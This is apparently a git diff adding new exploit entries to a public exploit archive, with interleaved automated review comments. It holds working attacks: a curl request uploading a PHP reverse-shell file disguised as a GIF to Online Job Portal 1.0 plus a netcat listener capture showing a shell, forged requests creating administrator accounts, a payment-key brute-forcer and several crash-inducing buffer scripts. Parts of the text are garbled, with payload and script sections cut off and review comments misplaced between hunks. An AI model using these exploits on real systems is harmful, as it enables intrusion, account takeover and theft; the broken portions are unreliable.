+Server: Apache/2.4.38 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev Perl/v5.16.3
+X-Powered-By: PHP/5.6.40
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
+Pragma: no-cache
+Content-Length: 167
+Connection: close
+Content-Type: text/html; charset=UTF-8
+
+Failed to get query handle: SQLSTATE[23000]: Integrity constraint violation: 1062 Duplicate entry '1root@localhost : exploitdb : 10.1.38-MariaDB1' for key 'group_key'
+#
\ No newline at end of file
diff --git a/exploits/php/webapps/48012.txt b/exploits/php/webapps/48012.txt
new file mode 100644
index 000000000..893fe8b69
--- /dev/null
+++ b/exploits/php/webapps/48012.txt
@@ -0,0 +1,33 @@
+# Exploit Title: Online Job Portal 1.0 - Remote Code Execution
+# Dork: N/A
+# Date: 2020-02-06
+# Exploit Author: Ihsan Sencan
+# Vendor Homepage: https://www.sourcecodester.com/php/13850/online-job-portal-phppdo.html
+# Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/jobportal.zip
+# Version: 1.0
+# Tested on: Linux
+# CVE: N/A
+
+# POC:
+# 1)
+#
+curl -i -s -k -X $'POST' \
+ -H $'Host: localhost' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:55.0) Gecko/20100101 Firefox/55.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H $'Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3' -H $'Accept-Encoding: gzip, deflate' -H $'Content-Type: multipart/form-data; boundary=---------------------------1852293616672951051689730436' -H $'Content-Length: 781' -H $'Referer: http://localhost/[PATH]/admin/user/index.php?view=view' -H $'Cookie: PHPSESSID=8aftj770keh6dlgj5sd4a1t5i4' -H $'DNT: 1' -H $'Connection: close' -H $'Upgrade-Insecure-Requests: 1' \
+ -b $'PHPSESSID=8aftj770keh6dlgj5sd4a1t5i4' \
+ --data-binary $'-----------------------------1852293616672951051689730436\x0d\x0aContent-Disposition: form-data; name=\"mealid\"\x0d\x0a\x0d\x0a\x0d\x0a-----------------------------1852293616672951051689730436\x0d\x0aContent-Disposition: form-data; name=\"MAX_FILE_SIZE\"\x0d\x0a\x0d\x0a1000000\x0d\x0a-----------------------------1852293616672951051689730436\x0d\x0aContent-Disposition: form-data; name=\"photo\"; filename=\"exp.php\"\x0d\x0aContent-Type: application/x-php\x0d\x0a\x0d\x0aGIF89c;\x0d\x0a $sock,\x0d\x0a1 => $sock,\x0d\x0a2 => $sock\x0d\x0a);\x0d\x0a\x0d\x0a$process = proc_open(\'/bin/sh\', $descriptorspec, $pipes);\x0d\x0aproc_close($process);?>\x0d\x0a\x0d\x0a-----------------------------1852293616672951051689730436\x0d\x0aContent-Disposition: form-data; name=\"savephoto\"\x0d\x0a\x0d\x0a\x0d\x0a-----------------------------1852293616672951051689730436--\x0d\x0a' \
+ $'http://localhost/[PATH]/admin/user/controller.php?action=photos'
+#
+curl -i -s -k -X $'GET' \
+ -H $'Host: localhost' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:55.0) Gecko/20100101 Firefox/55.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H $'Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3' -H $'Accept-Encoding: gzip, deflate' -H $'Cookie: PHPSESSID=8aftj770keh6dlgj5sd4a1t5i4' -H $'DNT: 1' -H $'Connection: close' -H $'Upgrade-Insecure-Requests: 1' \
+ -b $'PHPSESSID=8aftj770keh6dlgj5sd4a1t5i4' \
+ $'http://localhost/[PATH]/admin/user/photos/exp.php'
+#
+root@ihsan:~/ExploitDB# nc -nlvp 6666
+Ncat: Version 7.80 ( https://nmap.org/ncat )
+Ncat: Listening on :::6666
+Ncat: Listening on 0.0.0.0:6666
+Ncat: Connection from 192.168.1.104.
+Ncat: Connection from 192.168.1.104:35574.
+id
+uid=33(www-data) gid=33(www-data) groups=33(www-data)
+#
\ No newline at end of file
diff --git a/exploits/php/webapps/48016.txt b/exploits/php/webapps/48016.txt
new file mode 100644
index 000000000..7fde420c7
--- /dev/null
+++ b/exploits/php/webapps/48016.txt
@@ -0,0 +1,49 @@
+# Exploit Title: Online Job Portal 1.0 - Cross Site Request Forgery (Add User)
+# Dork: N/A
+# Date: 2020-02-06
+# Exploit Author: Ihsan Sencan
+# Vendor Homepage: https://www.sourcecodester.com/php/13850/online-job-portal-phppdo.html
+# Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/jobportal.zip
+# Version: 1.0
+# Tested on: Linux
+# CVE: N/A
+
+# POC:
+# 1)
+# Add User..
+#
+POST /admin/user/controller.php?action=add HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:55.0) Gecko/20100101 Firefox/55.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 106
+Cookie: PHPSESSID=8aftj770keh6dlgj5sd4a1t5i4
+DNT: 1
+Connection: close
+Upgrade-Insecure-Requests: 1
+
+user_id=1&deptid=&U_NAME=hacker&deptid=&U_USERNAME=hacker&deptid=&U_PASS=hacker&U_ROLE=Administrator&save=
+#
+
+# POC:
+# 2)
+# Edit User..
+#
+POST /admin/user/controller.php?action=edit HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:55.0) Gecko/20100101 Firefox/55.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 121
+Cookie: PHPSESSID=8aftj770keh6dlgj5sd4a1t5i4
+DNT: 1
+Connection: close
+Upgrade-Insecure-Requests: 1
+
+user_id=1&deptid=&U_NAME=hacker_edit&deptid=&U_USERNAME=hacker_edit&deptid=&U_PASS=hacker_edit&U_ROLE=Administrator&save=
+#
\ No newline at end of file
diff --git a/exploits/php/webapps/48017.php b/exploits/php/webapps/48017.php
new file mode 100644
index 000000000..7ec568921
--- /dev/null
+++ b/exploits/php/webapps/48017.php
@@ -0,0 +1,98 @@ +# Exploit Title: Ecommerce Systempay 1.0 - Production KEY Brute Force +# Author: live3 +# Date: 2020-02-05 +# Vendor Homepage: https://paiement.systempay.fr/doc/fr-FR/ +# Software Link: https://paiement.systempay.fr/doc/fr-FR/module-de-paiement-gratuit/ +# Tested on: MacOs +# Version: ALL + +'; + +$found = false; +$get_key = ''; + +// first check +if (sha1($sentence.$last_key_check) != $signature_from_post) { + for ($i = $last_key_check; $i <= $last_key_check+$how_many_key_to_check_for_loop; $i++) { + $get_key = $i; + if (sha1($sentence.$i) == $signature_from_post) { + echo 'Key found : '.$i.'
'; + $found = true; + break; + } + } +} else { + $found = true; +} + + +if ($found) { + $test_sha = sha1($sentence.$get_key); + echo 'Signature calc : '.$test_sha.'

'; +} else { + echo 'Last key check : '.$get_key.'

'; +} + + +echo 'Your sequence : '.$sentence.'
';
\ No newline at end of file
diff --git a/exploits/windows/dos/48005.py b/exploits/windows/dos/48005.py
new file mode 100755
index 000000000..739e0c71f
--- /dev/null
+++ b/exploits/windows/dos/48005.py
@@ -0,0 +1,22 @@
+# Exploit Title: AbsoluteTelnet 11.12 - "license name" Denial of Service (PoC)
+# Discovery by: chuyreds
+# Discovery Date: 2020-02-05
+# Vendor Homepage: https://www.celestialsoftware.net/
+# Software Link : https://www.celestialsoftware.net/telnet/AbsoluteTelnet11.12.exe
+# Tested Version: 11.12
+# Vulnerability Type: Denial of Service (DoS) Local
+# Tested on OS: Windows 10 Pro x64 es
+
+#Steps to produce the crash:
+#1.- Run python code: AbsoluteTelent 11.12_license_code.py
+#2.- Open AbsoluteTelent_license_code.txt and copy content to clipboard
+#3.- Open AbsoluteTelnet.exe
+#4.- Select "Help" > "Enter License Key"
+#5.- In "License code" paste Clipboard
+#6.- Crashed
+
+cod = "\x41" * 2500
+
+f = open('AbsoluteTelent_license_code.txt', 'w')
+f.write(cod)
+f.close()
\ No newline at end of file
diff --git a/exploits/windows/dos/48006.py b/exploits/windows/dos/48006.py
new file mode 100755
index 000000000..8b24a206d
--- /dev/null
+++ b/exploits/windows/dos/48006.py
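Review bot: When the first check already matches (`sha1($sentence.$last_key_check) == $signature_from_post`), the `else` branch sets `$found = true` but leaves `$get_key` as `''`, so the following `$test_sha = sha1($sentence.$get_key)` hashes the sentence with an empty key and the matching key is never printed; add `$get_key = $last_key_check;` inside that `else`. Both digest comparisons use PHP's loose `==`, which treats hex strings of the form `0e<digits>` as numeric and can declare two different digests equal; use `hash_equals($signature_from_post, sha1($sentence.$i))` (or at least `===`). The assignments of `$sentence`, `$signature_from_post`, `$last_key_check` and `$how_many_key_to_check_for_loop` are not visible in this hunk as rendered (its opening section is missing), so if they come from the request, `echo 'Your sequence : '.$sentence` reflects attacker-controlled input unescaped and should go through `htmlspecialchars()`. Also note the `<=` bound makes the loop test one more key than `$how_many_key_to_check_for_loop` suggests, which deserves a comment if intended.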
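Review bot: The title on the first line says `"license name"` but steps 1, 2 and 5 target the 'License code' field and the script writes `AbsoluteTelent_license_code.txt`, so this PoC is indistinguishable from 48006 by title; it should read `# Exploit Title: AbsoluteTelnet 11.12 - 'license code' Denial of Service (PoC)`, with single quotes like the sibling files. Steps 1–2 also misspell the product (`AbsoluteTelent`), and step 1 names a script with a space in it (`AbsoluteTelent 11.12_license_code.py`) that does not match this file. The last three lines should be a context manager, `with open('AbsoluteTelent_license_code.txt', 'w') as f:` / `    f.write(cod)`, which also removes the explicit `f.close()`. Ending at "Crashed" gives no evidence of the fault (exception code, faulting address, whether the 2500 bytes reach the stack); one line of debugger output would make the DoS claim reviewable.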
@@ -0,0 +1,23 @@
+# Exploit Title: AbsoluteTelnet 11.12 - "license name" Denial of Service (PoC)
+# Discovery by: chuyreds
+# Discovery Date: 2020-02-05
+# Vendor Homepage: https://www.celestialsoftware.net/
+# Software Link : https://www.celestialsoftware.net/telnet/AbsoluteTelnet11.12.exe
+# Tested Version: 11.12
+# Vulnerability Type: Denial of Service (DoS) Local
+# Tested on OS: Windows 10 Pro x64 es
+
+
+#Steps to produce the crash:
+#1.- Run python code: AbsoluteTelent 11.12_license_name.py
+#2.- Open AbsoluteTelent_license_name.txt and copy content to clipboard
+#3.- Open AbsoluteTelnet.exe
+#4.- Select "Help" > "Enter License Key"
+#5.- In "License Name" paste Clipboard
+#6.- Crashed
+
+cod = "\x41" * 2500
+
+f = open('AbsoluteTelent_license_name.txt', 'w')
+f.write(cod)
+f.close()
\ No newline at end of file
diff --git a/exploits/windows/dos/48010.py b/exploits/windows/dos/48010.py
new file mode 100755
index 000000000..5323012db
--- /dev/null
+++ b/exploits/windows/dos/48010.py
@@ -0,0 +1,22 @@
+# Exploit Title: AbsoluteTelnet 11.12 - 'SSH2/username' Denial of Service (PoC)
+# Discovery by: chuyreds
+# Discovery Date: 2020-02-05
+# Vendor Homepage: https://www.celestialsoftware.net/
+# Software Link : https://www.celestialsoftware.net/telnet/AbsoluteTelnet11.12.exe
+# Tested Version: 11.12
+# Vulnerability Type: Denial of Service (DoS) Local
+# Tested on OS: Windows 10 Pro x64 es
+
+#Steps to produce the crash:
+#1.- Run python code: AbsoluteTelnet 11.12_username_ssh2.py
+#2.- Open absolutetelnet_username_SSH2.txtabsolutetelnet_username.txt and copy content to clipboard
+#3.- Open AbsoluteTelnet
+#4.- Select "new connection file", "Connection", "SSH2", "Use last username"
+#5.- In "username" field paste Clipboard
+#6.- Select "OK"
+#7.- Crashed
+
+buffer = "\x41" * 1000
+f = open ("absolutetelnet_username_SSH2.txt", "w")
+f.write(buffer)
+f.close()
\ No newline at end of file
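Review bot: The `f = open(...)` / `f.write(cod)` / `f.close()` trio at the end should be `with open('AbsoluteTelent_license_name.txt', 'w') as f:` / `    f.write(cod)`, which closes the file even if the write raises. The `AbsoluteTelent` misspelling is carried from the file name into steps 1–2, and step 1 cites a script name containing a space (`AbsoluteTelent 11.12_license_name.py`) that is not this file's name, so the steps cannot be followed literally. As with 48005, the step list stops at "Crashed" with no exception, register or module information, so nothing shows that the 2500-byte License Name is what faults.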
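Review bot: Step 2 fuses two file names, `absolutetelnet_username_SSH2.txtabsolutetelnet_username.txt`, while the script writes only `absolutetelnet_username_SSH2.txt`; the step should read `#2.- Open absolutetelnet_username_SSH2.txt and copy content to clipboard`. Step 1 likewise names `AbsoluteTelnet 11.12_username_ssh2.py`, which does not match this file. The write should be a `with open("absolutetelnet_username_SSH2.txt", "w") as f:` block rather than `open`/`write`/`close`, matching the fix the other PoCs in this commit need.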
diff --git a/exploits/windows/dos/48011.py b/exploits/windows/dos/48011.py
new file mode 100755
index 000000000..bba3208c2
--- /dev/null
+++ b/exploits/windows/dos/48011.py
@@ -0,0 +1,24 @@
+# Exploit Title: TapinRadio 2.12.3 - 'address' Denial of Service (PoC)
+# Discovery by: chuyreds
+# Discovery Date: 2020-02-05
+# Vendor Homepage: http://www.raimersoft.com/rarmaradio.html
+# Software Link : http://www.raimersoft.com/downloads/tapinradio_setup_x64.exe
+# Tested Version: 2.12.3
+# Vulnerability Type: Denial of Service (DoS) Local
+# Tested on OS: Windows 10 Pro x64 es
+
+#Steps to produce the crash:
+#1.- Run python code: tapinadio_address.py
+#2.- Open tapin_add.txt and copy content to clipboard
+#3.- Open TapinRadio
+#4.- Select "Settings" > "Preferences" > "Miscellaneous"
+#5.- Select "Set Application Proxy..."" In "Address" field paste Clipboard
+#6.- In Port type "444" > "Username" type "test" > Password type "1234"
+#7.- Select "OK" and "OK"
+#8.- Crashed
+
+cod = "\x41" * 3000
+
+f = open('tapin_add.txt', 'w')
+f.write(cod)
+f.close()
\ No newline at end of file
diff --git a/exploits/windows/dos/48013.py b/exploits/windows/dos/48013.py
new file mode 100755
index 000000000..3072578d8
--- /dev/null
+++ b/exploits/windows/dos/48013.py
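Review bot: Step 1 says `tapinadio_address.py` (missing the `r` of TapinRadio) and step 5 has a doubled quote in `"Set Application Proxy..""`; correct them to `#1.- Run python code: tapinradio_address.py` and `#5.- Select "Set Application Proxy..." In "Address" field paste Clipboard` so the steps can be followed as written. Steps 6–7 make the user fill in port, username and password before the crash; say whether those values matter or whether the 3000-byte Address alone triggers it. The file write should be `with open('tapin_add.txt', 'w') as f:` / `    f.write(cod)` instead of `open`/`write`/`close`.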
@@ -0,0 +1,24 @@
+# Exploit Title: TapinRadio 2.12.3 - 'username' Denial of Service (PoC)
+# Discovery by: chuyreds
+# Discovery Date: 2020-02-05
+# Vendor Homepage: http://www.raimersoft.com/rarmaradio.html
+# Software Link : http://www.raimersoft.com/downloads/tapinradio_setup_x64.exe
+# Tested Version: 2.12.3
+# Vulnerability Type: Denial of Service (DoS) Local
+# Tested on OS: Windows 10 Pro x64 es
+
+#Steps to produce the crash:
+#1.- Run python code: tapinadio_user.py
+#2.- Open tapin_user.txt and copy content to clipboard
+#3.- Open TapinRadio
+#4.- Select "Settings" > "Preferences" > "Miscellaneous"
+#5.- Select "Set Application Proxy..."" In "Username" field paste Clipboard
+#6.- In Server type "1.1.1.1" > Port type 444 > Password type "1234"
+#7.- Select "OK" and "OK"
+#8.- Crashed
+
+cod = "\x41" * 10000
+
+f = open('tapin_user.txt', 'w')
+f.write(cod)
+f.close()
\ No newline at end of file
diff --git a/exploits/windows/dos/48014.py b/exploits/windows/dos/48014.py
new file mode 100755
index 000000000..b2a9df448
--- /dev/null
+++ b/exploits/windows/dos/48014.py
@@ -0,0 +1,21 @@
+# Exploit Title: RarmaRadio 2.72.4 - 'username' Denial of Service (PoC)
+# Discovery by: chuyreds
+# Discovery Date: 2020-02-05
+# Vendor Homepage: http://www.raimersoft.com/rarmaradio.html
+# Software Link : http://www.raimersoft.com/downloads/rarmaradio_setup.exe
+# Tested Version: 2.72.4
+# Vulnerability Type: Denial of Service (DoS) Local
+# Tested on OS: Windows 10 Pro x64 es
+
+#Steps to produce the crash:
+#1.- Run python code: rarmaradio_username.py
+#2.- Open RarmaRadio2.72.4_username.txt and copy content to clipboard
+#3.- Open RarmaRadio
+#4.- Select "Edit" > "Settings" > "Network"
+#5.- In "Username" field paste Clipboard
+#6.- Select "OK"
+#7.- Crashed
+buffer = "\x41" * 5000
+f = open ("RarmaRadio2.72.4_username.txt", "w")
+f.write(buffer)
+f.close()
\ No newline at end of file
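Review bot: Step 1 names `tapinadio_user.py` (same typo as the sibling TapinRadio PoC) and step 5 has a doubled quote after `Proxy...`; fix to `#1.- Run python code: tapinradio_user.py` and `"Set Application Proxy..."`. The buffer here is 10000 bytes while the address PoC uses 3000; if a smaller Username also crashes, say so, otherwise readers will assume the length is significant. Replace the `open`/`write`/`close` trio with `with open('tapin_user.txt', 'w') as f:` / `    f.write(cod)`.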
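Review bot: The last four lines run straight on from `#7.- Crashed` with no blank line and open the file without a context manager; `with open("RarmaRadio2.72.4_username.txt", "w") as f:` / `    f.write(buffer)` is the idiomatic form and drops `f.close()`. Like the other PoCs in this commit, the steps end at "Crashed" with no exception code or register dump, so there is nothing that ties the fault to the 5000-byte Username.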
diff --git a/exploits/windows/dos/48015.py b/exploits/windows/dos/48015.py
new file mode 100755
index 000000000..63a6917f6
--- /dev/null
+++ b/exploits/windows/dos/48015.py
@@ -0,0 +1,22 @@
+# Exploit Title: RarmaRadio 2.72.4 - 'server' Denial of Service (PoC)
+# Discovery by: chuyreds
+# Discovery Date: 05-02-2020
+# Vendor Homepage: http://www.raimersoft.com/rarmaradio.html
+# Software Link : http://www.raimersoft.com/downloads/rarmaradio_setup.exe
+# Tested Version: 2.72.4
+# Vulnerability Type: Denial of Service (DoS) Local
+# Tested on OS: Windows 10 Pro x64 es
+
+# Steps to produce the crash:
+#1.- Run python code: RarmaRadio2.72.4_server.py
+#2.- Open RarmaRadio2.72.4_server.txt and copy content to clipboard
+#3.- Open RarmaRadio
+#4.- Select "Edit" > "Settings" > "Network"
+#5.- In "Server" field paste Clipboard
+#6.- Select "OK"
+#7.- Crashed
+
+buffer = "\x41" * 4000
+f = open ("RarmaRadio2.72.4_server.txt", "w")
+f.write(buffer)
+f.close()
\ No newline at end of file
diff --git a/exploits/windows/local/48009.txt b/exploits/windows/local/48009.txt
new file mode 100644
index 000000000..28e3ec2cb
--- /dev/null
+++ b/exploits/windows/local/48009.txt
@@ -0,0 +1,25 @@
+#Exploit Title: ELAN Smart-Pad 11.10.15.1 - 'ETDService' Unquoted Service Path
+#Exploit Author : ZwX
+#Exploit Date: 2020-02-05
+#Vendor : ELAN Microelectronics
+#Vendor Homepage : http://www.emc.com.tw/
+#Tested on OS: Windows 10 v1803
+
+
+#Analyze PoC :
+==============
+
+
+C:\Users\ZwX>sc qc ETDService
+[SC] QueryServiceConfig réussite(s)
+
+SERVICE_NAME: ETDService
+ TYPE : 10 WIN32_OWN_PROCESS
+ START_TYPE : 2 AUTO_START
+ ERROR_CONTROL : 1 NORMAL
+ BINARY_PATH_NAME : C:\Program Files\Elantech\ETDService.exe
+ LOAD_ORDER_GROUP :
+ TAG : 0
+ DISPLAY_NAME : Elan Service
+ DEPENDENCIES :
+ SERVICE_START_NAME : LocalSystem
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index c8746fec7..c3ce8e278 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
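Review bot: `# Discovery Date: 05-02-2020` uses day-month-year while every sibling file in this commit and the index row use ISO `2020-02-05`; change it to `# Discovery Date: 2020-02-05` so the metadata is consistent and parses the same way. `# Steps to produce the crash:` also carries a space the other files omit. Replace the `open`/`write`/`close` trio with `with open("RarmaRadio2.72.4_server.txt", "w") as f:` / `    f.write(buffer)`.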
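Review bot: The advisory stops at the `sc qc` listing and never states what an attacker needs in order to abuse `BINARY_PATH_NAME : C:\Program Files\Elantech\ETDService.exe`; the only hijack candidates for that path are `C:\Program.exe` and `C:\Program Files\Elantech.exe`, and on a default Windows 10 install neither `C:\` nor `C:\Program Files\` is writable by a standard user, so the unquoted path by itself is not a privilege escalation. Add a line after the listing such as `# Exploitable only if a low-privileged user can write to C:\ or C:\Program Files\ (not the default ACLs); the service runs as LocalSystem with AUTO_START, so a planted binary would execute at the next boot or service restart`. An `icacls` check of those two directories on the test machine would make the impact claim reviewable.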
@@ -6666,6 +6666,14 @@ id,file,description,date,author,type,platform,port
 47970,exploits/multiple/dos/47970.txt,"macOS/iOS ImageIO - Heap Corruption when Processing Malformed TIFF Image",2020-01-28,"Google Security Research",dos,multiple,
 47987,exploits/linux/dos/47987.cs,"BearFTP 0.1.0 - 'PASV' Denial of Service",2020-02-03,kolya5544,dos,linux,
 47993,exploits/ios/dos/47993.py,"P2PWIFICAM2 for iOS 10.4.1 - 'Camera ID' Denial of Service (PoC)",2020-02-03,"Ivan Marmolejo",dos,ios,
+48005,exploits/windows/dos/48005.py,"AbsoluteTelnet 11.12 - _license name_ Denial of Service (PoC)",2020-02-06,chuyreds,dos,windows,
+48006,exploits/windows/dos/48006.py,"AbsoluteTelnet 11.12 - 'license name' Denial of Service (PoC)",2020-02-06,chuyreds,dos,windows,
+48008,exploits/linux/dos/48008.txt,"VIM 8.2 - Denial of Service (PoC)",2020-02-06,"Dhiraj Mishra",dos,linux,
+48010,exploits/windows/dos/48010.py,"AbsoluteTelnet 11.12 - 'SSH2/username' Denial of Service (PoC)",2020-02-06,chuyreds,dos,windows,
+48011,exploits/windows/dos/48011.py,"TapinRadio 2.12.3 - 'address' Denial of Service (PoC)",2020-02-06,chuyreds,dos,windows,
+48013,exploits/windows/dos/48013.py,"TapinRadio 2.12.3 - 'username' Denial of Service (PoC)",2020-02-06,chuyreds,dos,windows,
+48014,exploits/windows/dos/48014.py,"RarmaRadio 2.72.4 - 'username' Denial of Service (PoC)",2020-02-06,chuyreds,dos,windows,
+48015,exploits/windows/dos/48015.py,"RarmaRadio 2.72.4 - 'server' Denial of Service (PoC)",2020-02-06,chuyreds,dos,windows,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
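Review bot: Rows 48005 and 48006 receive the same description apart from `_license name_` versus `'license name'`, which hides that 48005 actually targets the License code field (its steps say "License code"); the 48005 row should read `"AbsoluteTelnet 11.12 - 'license code' Denial of Service (PoC)"` so the two entries are distinguishable and quoted like every other row. The underscores look like an artifact of escaping the double quotes in 48005's title line and will propagate into searchsploit output as written.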
@@ -10928,6 +10936,7 @@ id,file,description,date,author,type,platform,port
 47995,exploits/linux/local/47995.txt,"Sudo 1.8.25p - Buffer Overflow",2020-02-04,"Joe Vennix",local,linux,
 47999,exploits/linux/local/47999.txt,"Socat 1.7.3.4 - Heap-Based Overflow (PoC)",2020-02-05,hieubl,local,linux,
 48000,exploits/linux/local/48000.sh,"xglance-bin 11.00 - Privilege Escalation",2020-02-05,redtimmysec,local,linux,
+48009,exploits/windows/local/48009.txt,"ELAN Smart-Pad 11.10.15.1 - 'ETDService' Unquoted Service Path",2020-02-06,ZwX,local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -42300,3 +42309,10 @@ id,file,description,date,author,type,platform,port
 48001,exploits/java/webapps/48001.py,"Kronos WebTA 4.0 - Authenticated Remote Privilege Escalation",2020-02-05,nxkennedy,webapps,java,
 48002,exploits/json/webapps/48002.py,"Verodin Director Web Console 3.5.4.0 - Remote Authenticated Password Disclosure (PoC)",2020-02-05,nxkennedy,webapps,json,
 48003,exploits/json/webapps/48003.txt,"AVideo Platform 8.1 - Cross Site Request Forgery (Password Reset)",2020-02-05,"Ihsan Sencan",webapps,json,
+48007,exploits/php/webapps/48007.txt,"Online Job Portal 1.0 - 'user_email' SQL Injection",2020-02-06,"Ihsan Sencan",webapps,php,
+48012,exploits/php/webapps/48012.txt,"Online Job Portal 1.0 - Remote Code Execution",2020-02-06,"Ihsan Sencan",webapps,php,
+48016,exploits/php/webapps/48016.txt,"Online Job Portal 1.0 - Cross Site Request Forgery (Add User)",2020-02-06,"Ihsan Sencan",webapps,php,
+48017,exploits/php/webapps/48017.php,"Ecommerce Systempay 1.0 - Production KEY Brute Force",2020-02-06,live3,webapps,php,
+48018,exploits/java/webapps/48018.py,"Cisco Data Center Network Manager 11.2 - Remote Code Execution",2020-02-06,mr_me,webapps,java,
+48019,exploits/java/webapps/48019.py,"Cisco Data Center Network Manager 11.2.1 - 'getVmHostData' SQL Injection",2020-02-06,mr_me,webapps,java,
+48020,exploits/java/webapps/48020.py,"Cisco Data Center Network Manager 11.2.1 - 'LanFabricImpl' Command Injection",2020-02-06,mr_me,webapps,java,